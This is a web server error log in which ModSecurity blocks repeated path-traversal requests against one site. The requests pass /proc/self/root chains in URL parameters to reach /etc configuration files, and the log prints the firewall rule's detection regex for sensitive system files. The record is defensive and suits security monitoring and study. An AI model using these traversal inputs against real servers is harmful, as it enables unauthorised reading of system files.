[Mon Mar 16 22:09:59.451998 2026] [:error] [pid 21806:tid 140411741927168] [client 74.7.243.203:51984] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/dovecot"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abip59SswJuvopo3lOiTlgAAAIA"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Mon Mar 16 22:10:01.951130 2026] [:error] [pid 10772:tid 140411725141760] [client 74.7.241.46:34372] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/issue.net"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abip6f9ocpUE4ed4uDwnmQAAAgI"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Mon Mar 16 22:10:02.423482 2026] [:error] [pid 10772:tid 140411733534464] [client 74.7.241.46:34372] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/firewalld"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abip6v9ocpUE4ed4uDwnmgAAAgE"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Mon Mar 16 22:10:03.086950 2026] [:error] [pid 29507:tid 140411599251200] [client 74.7.243.203:36882] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/postfix"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abip60r9dMAiw-8KANN7jwAAARE"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Mon Mar 16 22:10:04.015087 2026] [:error] [pid 29507:tid 140411683178240] [client 74.7.243.203:36882] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/rpm"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abip7Er9dMAiw-8KANN7kAAAAQc"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Mon Mar 16 22:10:06.313437 2026] [:error] [pid 21806:tid 140411632822016] [client 74.7.243.203:36892] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/openldap"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abip7dSswJuvopo3lOiTmgAAAI0"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Mon Mar 16 22:10:06.343883 2026] [:error] [pid 10651:tid 140411540502272] [client 74.7.241.46:40726] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/puppetlabs"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abip7bysWC90G-1nBrB2hgAAAZg"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Mon Mar 16 22:10:09.117771 2026] [proxy_fcgi:error] [pid 29802:tid 140411590858496] (70007)The timeout specified has expired: [client 45.227.253.15:54744] AH01075: Error dispatching request to : (polling)
[Mon Mar 16 22:10:15.579267 2026] [:error] [pid 21805:tid 140411607643904] [client 74.7.241.46:46966] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/terminfo"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abip97ABkC4fWIHEf8EvIQAAAFA"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Mon Mar 16 22:10:17.012568 2026] [:error] [pid 21805:tid 140411540502272] [client 74.7.241.46:46976] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/telegraf"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abip-bABkC4fWIHEf8EvIgAAAFg"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Mon Mar 16 22:10:19.864926 2026] [:error] [pid 15568:tid 140411658000128] [client 74.7.241.46:45772] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/portreserve"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abip-6QpVkWug9HeOt9jmQAAA0o"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Mon Mar 16 22:10:20.547517 2026] [:error] [pid 10772:tid 140411666392832] [client 74.7.243.203:36202] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/xdg"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abip_P9ocpUE4ed4uDwnoQAAAgk"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Mon Mar 16 22:10:21.486231 2026] [:error] [pid 21805:tid 140411616036608] [client 74.7.241.46:45778] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/openldap"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abip_bABkC4fWIHEf8EvJgAAAE8"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Mon Mar 16 22:10:22.145217 2026] [:error] [pid 10772:tid 140411616036608] [client 74.7.243.203:39004] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/pure-ftpd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abip_v9ocpUE4ed4uDwnpgAAAg8"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Mon Mar 16 22:10:22.775152 2026] [:error] [pid 10772:tid 140411741927168] [client 74.7.241.46:45782] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/alternatives"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abip_v9ocpUE4ed4uDwnqAAAAgA"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Mon Mar 16 22:10:23.589315 2026] [:error] [pid 10772:tid 140411641214720] [client 74.7.243.203:39018] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/telegraf"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abip__9ocpUE4ed4uDwnqQAAAgw"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Mon Mar 16 22:10:25.466555 2026] [:error] [pid 21806:tid 140411599251200] [client 74.7.241.46:45798] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/security"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abiqAdSswJuvopo3lOiToAAAAJE"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Mon Mar 16 22:10:25.976197 2026] [:error] [pid 15568:tid 140411624429312] [client 74.7.243.203:39032] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/groff"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abiqAaQpVkWug9HeOt9jpQAAA04"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Mon Mar 16 22:10:26.770973 2026] [:error] [pid 10772:tid 140411557287680] [client 74.7.241.46:45804] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/plymouth"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abiqAv9ocpUE4ed4uDwnqwAAAhY"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Mon Mar 16 22:10:28.031214 2026] [:error] [pid 29802:tid 140411708356352] [client 74.7.241.46:59994] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/ppp"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abiqBM_BxrYCr4hPDw8c7QAAAcQ"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Mon Mar 16 22:10:29.722958 2026] [:error] [pid 15568:tid 140411708356352] [client 74.7.241.46:60002] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/postfix"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abiqBaQpVkWug9HeOt9jsgAAA0Q"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Mon Mar 16 22:10:31.145772 2026] [proxy_fcgi:error] [pid 15061:tid 140411708356352] (70007)The timeout specified has expired: [client 179.188.53.243:44354] AH01075: Error dispatching request to : (polling)
[Mon Mar 16 22:10:52.081899 2026] [proxy_fcgi:error] [pid 29507:tid 140411741927168] (70007)The timeout specified has expired: [client 179.188.53.243:44864] AH01075: Error dispatching request to : (polling)
[Mon Mar 16 22:10:53.099717 2026] [:error] [pid 15568:tid 140411725141760] [client 74.7.243.203:39034] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/dhcp"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abiqHaQpVkWug9HeOt9jzAAAA0I"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Mon Mar 16 22:10:54.130751 2026] [:error] [pid 29507:tid 140411624429312] [client 74.7.241.46:60946] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/logrotate.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id 